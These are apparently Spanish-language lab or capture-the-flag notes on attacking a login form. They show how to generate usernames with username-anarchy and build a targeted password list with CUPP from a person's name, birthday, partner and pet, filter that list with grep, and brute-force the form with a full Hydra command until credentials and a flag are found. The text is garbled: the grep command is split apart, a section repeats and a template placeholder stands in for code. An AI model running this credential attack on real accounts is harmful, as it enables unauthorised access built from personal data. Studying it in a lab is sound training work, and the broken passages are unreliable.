🧰 Listas de Palabras Personalizadas

👤 Anarquía de Nombres de Usuario (Username Anarchy)

📦 Instalación

sudo apt install ruby -y
git clone https://github.com/urbanadventurer/username-anarchy.git
cd username-anarchy

🛠️ Generación de nombres de usuario

./username-anarchy Jane Smith > jane_smith_usernames.txt

🗝️ CUPP – Generador de Contraseñas Personalizadas

📦 Instalación

sudo apt install cupp -y

🧪 Modo interactivo

cupp -i

Ejemplo de datos introducidos para generar “jane.txt”:

• Nombre: Jane Smith

• Apodo: Janey

• Cumpleaños: 11/12/1990

• Pareja: Jim (“Jimbo”)

• Mascota: Spot

• Empresa: AHI

• Intereses: hacker, azul

• Leetspeak: Sí

• Símbolos especiales: Sí

• Números aleatorios: Sí

🧹 Filtrado según la política de contraseñas de la empresa

• Min. 6 caracteres

• ≥1 mayúscula

• ≥1 minúscula

• ≥1 número

• ≥2 símbolos (!@#$%^&*)

🔍 Filtrar con grep

grep -E '^.{6,}
Resultado final: lista reducida (~7.900 contraseñas útiles).

---

# ⚔️ Fuerza Bruta con Hydra

> [!tip] **Sustituye IP y PORT por los de tu objetivo.**

``` bash
hydra -L jane_smith_usernames.txt -P jane-filtered.txt IP -s PORT -f http-post-form "/:username=^USER^&password=^PASS^:Invalid credentials"

Usuario jane contraseña 3n43 !!

Una vez Hydra encuentre credenciales válidas → inicia sesión y obtiene la flag.
jane.txt | grep -E '[A-Z]' | grep -E '[a-z]' | grep -E '[0-9]' | grep -E '([!@#$%^&].){2,}' > jane-filtered.txt

Resultado final: lista reducida (~7.900 contraseñas útiles).

---

# ⚔️ Fuerza Bruta con Hydra

> [!tip] **Sustituye IP y PORT por los de tu objetivo.**

{{CODE_BLOCK_5}}
![{E48DA594-B0F9-4E4E-9FA3-5AA286AFDE44}.png](/img/user/Gorosolea/Imagenes/%7BE48DA594-B0F9-4E4E-9FA3-5AA286AFDE44%7D.png)
Usuario jane contraseña `3n43 !!`

Una vez Hydra encuentre credenciales válidas → inicia sesión y obtiene la flag.
![{07FF8A17-110E-4D97-9AC8-73F01FF9F70C}.png](/img/user/Gorosolea/Imagenes/%7B07FF8A17-110E-4D97-9AC8-73F01FF9F70C%7D.png)